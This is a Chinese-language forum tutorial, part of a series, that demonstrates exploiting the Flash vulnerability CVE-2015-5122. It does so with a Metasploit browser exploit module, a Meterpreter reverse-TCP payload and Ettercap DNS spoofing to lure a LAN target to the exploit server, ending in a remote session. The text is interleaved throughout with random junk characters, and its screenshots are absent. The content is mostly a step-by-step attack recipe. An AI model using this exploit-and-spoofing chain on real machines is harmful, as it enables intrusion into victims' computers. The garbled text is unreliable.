|
- T6 o$ M7 J0 p+ n: S" \1 c 二、cve2015-5122漏洞实例演示虚拟机
6 w/ t4 F+ b+ |1 z n/ h! Y( P( { 4 R" a( }' P, W% {* P. h( H+ s
2 H3 V! Y% I6 o9 K+ p, A$ S: i; E
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
! ` f. @/ j1 ~$ v+ x' |* {
1 _) h9 _: J% g/ f5 `2 |* A( j8 A4 E8 s1 m5 N
search cve-2015-5122如图:
- y8 U/ q2 A( g" r0 D . b+ p4 h3 o% p
! K8 A% j7 ?4 d& r. ~& `
4 {8 Q1 ]6 b" F- y! N 0 `! x$ u3 {0 c" m! K+ P
% G7 ?" Y- {" `2 Y9 X. s 下面我们敲如下命令: 4 ?+ J; d' f& f1 ?$ p6 ^
2 N3 y0 a, c" u# x2 V5 E: K/ A* N, i" u
use exploit/multi/browser/adobe_flash_opaque_background_uaf
3 x( [$ T# m( W6 S* D$ X% |" r7 {) I
& j1 U7 d, R& L( ?8 v) b3 o- T
1 U2 | l8 n% ? set PAYLOAD windows/meterpreter/reverse_tcp
! w# u5 f4 g0 E6 W/ T 6 B% w, |7 ~ a
, L' A3 Q' K- ]' x
set LHOST 192.168.0.109
8 u" ^9 X2 Z! @( E, A. @ y" L7 j( V
7 \$ @; D2 a; }( s. g% c$ E$ _% Y9 L9 r
set URIPATH / /*根目录*/
, H/ q/ [2 s- @; z& g1 j# ~
3 m$ U8 r5 e8 ~' q3 o6 e$ a5 W1 d/ \0 i2 a! `# [2 a& ^! Q
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 " q* r; W1 u# U5 G
3 b% j/ E3 @# Z3 \' w7 i6 W
. q; B: j* C8 R% M! Y4 b" C" n set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
$ U# P* m9 h4 A0 K/ E
* k8 @+ L1 I0 ?, a. d
5 c4 h+ ~8 h, f' K7 I% r 然后show options如图:
' A& e& K/ u# C! g' A' ~ 1 }3 z5 X0 N; p$ H1 I7 ~( X
& f0 f7 c6 h) S B6 z
( c7 W4 f4 W/ z1 E1 y0 Y( I0 t8 t
4 i% D$ x1 h4 q$ ?
$ ~: U' ?- q0 @0 x; a0 d; W 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ; E' W6 c) `9 [+ e$ @7 T5 S2 I# x
' d7 J/ u9 Z; s2 B4 ~4 u% z2 E
) k2 G- W! j9 u! b" ]0 J+ _4 J7 b
* l5 F8 Z a8 l4 N0 m7 V8 o8 D 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 5 w9 j( y' k: f+ m+ n% W
6 c* y! W- ^, r$ s z0 I3 N) w. m% ^* T
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
6 E" Z3 \& y/ h) } ' a" E2 f& l$ @, k: y4 c
: X4 e! x) X f) J% @+ k
0 F# O( l; W' L- Z/ ?9 @# ^: Q * p8 y Y6 a' K" G
0 W# s+ q8 e* W+ y( E 成功了,这时候我们断开ettercap,如图: 1 w+ }# ?* I; U% \, `( S; {
; a( ^$ \+ _" f, T
; [7 F- i f+ L; @ T
" k/ _7 o. h* _& q! e @# z+ w3 r
8 s) w: y A/ i, V; [8 C4 C" o0 D7 z+ {$ P
Screenshot如图:
- R$ J2 o! c# J7 _. b& e! N' k % U# Q; v8 v) N( `5 ^/ c$ N5 r% E
b- j* R/ z" L$ |. v4 r$ { l
+ V; h! o. ]# X# O4 B
! p" I) `6 A; \% _5 C0 g" ]) r0 c7 K# y7 ^- a$ @1 n$ T
1 k. W h8 k( `( D, E2 X6 f" x |